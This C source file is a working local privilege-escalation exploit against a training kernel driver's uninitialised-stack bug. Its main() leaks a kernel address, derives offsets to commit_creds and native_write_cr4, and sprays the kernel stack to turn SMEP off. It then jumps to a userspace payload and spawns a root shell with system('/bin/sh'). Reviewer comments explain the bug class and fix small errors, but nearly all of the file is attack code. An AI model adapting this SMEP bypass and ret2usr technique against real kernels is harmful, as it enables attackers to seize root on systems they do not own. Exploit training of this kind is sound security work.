#define _GNU_SOURCE
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <time.h>
#include <pthread.h>
#include "common.h"
#include "../src/vuln_driver.h"
#define NUM_THREADS 3000 /* number of threads stack_spray() starts; each issues one ioctl */
int fd; /* device handle opened in main(); read by do_ioctl(), so shared by all spray threads */
/*
 * Userspace mirror of the driver's stack-resident object. Not referenced
 * elsewhere in this file; it documents the (fn_arg, fn) order that main()'s
 * first spray loop reproduces. Confirm the field order against
 * ../src/vuln_driver.h before relying on it.
 */
typedef struct stack_obj
{
int do_callback; /* presumably gates the fn call in the driver — verify there */
long fn_arg; /* argument handed to fn */
void (*fn)(long) ; /* callback the driver invokes; the bug is that it is read uninitialised */
}stack_obj;
/* Argument block for the UNINITIALISED_STACK_USE ioctl (see do_page_fault() and main()). */
typedef struct use_obj_args
{
int option; /* both callers in this file set 1; meaning is driver-defined */
long fn_arg; /* both callers in this file set 1337; meaning is driver-defined */
}use_obj_args;
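/*
 * Thread body for stack_spray(): issues one UNINITIALISED_STACK_ALLOC ioctl
 * on the shared global fd with the caller-supplied buffer.
 *
 * @param arg  char * buffer handed to pthread_create(); not owned here.
 * @return     Always NULL. The original fell off the end of a non-void
 *             function, which is undefined behaviour (C11 6.9.1p12) once
 *             pthread_join() collects the thread's return value.
 *             The ioctl result is ignored, as before.
 */
void *do_ioctl(void *arg)
{
char *buff = arg; /* void * converts to char * implicitly in C */
(void)ioctl(fd, UNINITIALISED_STACK_ALLOC, buff);
return NULL;
}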
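/*
 * Runs NUM_THREADS concurrent do_ioctl() calls over the same buffer.
 * Not called from main() in this file.
 *
 * @param buff  buffer passed unchanged to every thread; must stay valid
 *              until this function returns (all started threads are joined).
 *
 * Fix: the original joined every slot regardless of whether pthread_create()
 * succeeded, so a failed create (e.g. EAGAIN near the thread limit) left an
 * indeterminate pthread_t that was then passed to pthread_join() — undefined
 * behaviour. Creation now stops at the first failure and only started
 * threads are joined.
 */
void stack_spray(char *buff)
{
pthread_t threads[NUM_THREADS];
int started = 0;
while (started < NUM_THREADS)
{
if (pthread_create(&threads[started], NULL, do_ioctl, buff) != 0)
{
break; /* threads[started] is indeterminate; do not join it */
}
started++;
}
for (int i = 0; i < started; i++)
{
(void)pthread_join(threads[i], NULL);
}
}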
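/*
 * Child-side trigger, called by main() after fork(). Opens its own handle
 * to the device and issues UNINITIALISED_STACK_USE with no preceding
 * UNINITIALISED_STACK_ALLOC; per the author's comment below the stale fn
 * is 0 at that point and the kernel page-faults.
 *
 * Fixes: the original never checked open() and never closed child_fd, so a
 * failed open turned into an EBADF ioctl on -1 with no visible error, and a
 * successful open leaked the descriptor. PATH comes from common.h.
 */
void do_page_fault(void)
{
use_obj_args use_obj = {
.option = 1,
.fn_arg = 1337,
};
int child_fd = open(PATH, O_RDWR);
if (child_fd < 0)
{
perror("[x] open(PATH)");
return;
}
//trigger a pagefault trying to call fn()->0
(void)ioctl(child_fd, UNINITIALISED_STACK_USE, &use_obj);
close(child_fd);
}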
/*
 * Proof-of-concept for the uninitialised-kernel-stack bug in the training
 * driver. Everything not defined in this file (force_single_core,
 * map_and_copy, get_info_leak, commit_creds, prepare_kernel_cred, the
 * *_OFFSET / TARGET_CR4 / MMAP_ADDR / MAP_SIZE constants) comes from
 * common.h or ../src/vuln_driver.h — consult those for the actual values.
 *
 * Bug class, from a defender's view: UNINITIALISED_STACK_USE reads a
 * stack_obj that was never initialised, so whatever a previous
 * UNINITIALISED_STACK_ALLOC left on the kernel stack is trusted as
 * (fn_arg, fn). Compiler-driven stack auto-initialisation (e.g.
 * CONFIG_INIT_STACK_ALL_ZERO) removes this class; per the author's comment
 * below, the first spray exists only to turn SMEP off.
 */
int main(void)
{
force_single_core();
/* NOTE(review): open() is unchecked; if the device is missing fd == -1 and every ioctl below fails with EBADF. */
fd = open("/dev/vulnerable_device", O_RDWR);
/* NOTE(review): addr is passed by value and stays NULL, so the munmap() at the end
 * does not release whatever map_and_copy() mapped — confirm against common.h. */
void *addr = NULL;
if(map_and_copy(addr) == -1)
{
printf("[x] Error mapping address [x]\n");
exit(-1);
}
char buff[4096];
memset(buff, 0x00, sizeof(buff));
use_obj_args use_obj = {
.option = 1,
.fn_arg = 1337,
};
/* Stage 1: a child triggers the bug with no spray in place; per do_page_fault()'s
 * comment this faults on fn == 0, and the parent then recovers an address with
 * get_info_leak() (how it does so is in common.h).
 * NOTE(review): the child never calls exit(); if the ioctl returns instead of
 * killing it, the child falls through into the parent's code path below. */
pid_t pid = fork();
if(pid == 0)
do_page_fault();
wait(NULL);
long leak = get_info_leak();
/* Kernel symbols are assumed to sit at fixed offsets from the leaked address. */
long native_cr4_write = leak - CR4_WRITE_OFFSET;
commit_creds = leak - COMMIT_CREDS_OFFSET;
prepare_kernel_cred = leak - PREPARE_CRED_OFFSET;
long target_cr4 = TARGET_CR4;
printf("[+] Leaked address %p calculating offsets:\n\tnative_write_cr4: %p\n\tprepare_kernel_cred: %p\n\tcommit_creds: %p\n\t\n",
(void *)leak,(void *) native_cr4_write, (void *)prepare_kernel_cred, (void *)commit_creds );
size_t long_size = sizeof(long);
/* Spray the stack space with our target function and its argument */
/* Stage 2: buff becomes repeating (TARGET_CR4, native_write_cr4) pairs, in the same
 * relative order as stack_obj's fn_arg and fn fields. */
for(int i =0; i < 4096; i += long_size*2)
{
memcpy(buff+i, &target_cr4, long_size);
memcpy(buff+i+long_size, &native_cr4_write, long_size);
}
/* Allocate our buffer on the kernel stack, and then trigger the vuln */
/* NOTE(review): neither ioctl's return value is checked here or in stage 3. */
ioctl(fd, UNINITIALISED_STACK_ALLOC, buff);
ioctl(fd, UNINITIALISED_STACK_USE, &use_obj);
/* At this point SMEP is disabled */
memset(buff, 0, sizeof(buff));
long target_address = MMAP_ADDR;
/* Spray the stack space with our userspace address */
/* Stage 3: every 8-byte slot is MMAP_ADDR, so fn_arg and fn both point at the
 * region map_and_copy() prepared; its contents are defined in common.h. */
for(int i =0; i < 4096; i += long_size)
{
memcpy(buff+i, &target_address, long_size);
}
/* Allocate our buffer on the kernel stack and trigger the vuln */
ioctl(fd, UNINITIALISED_STACK_ALLOC, buff);
ioctl(fd, UNINITIALISED_STACK_USE, &use_obj);
/* Success criterion: the process is now uid 0. */
if(getuid() == 0)
{
printf("[!!!] Popping root shell [!!!]\n");
system("/bin/sh");
}
close(fd);
munmap(addr, MAP_SIZE);
}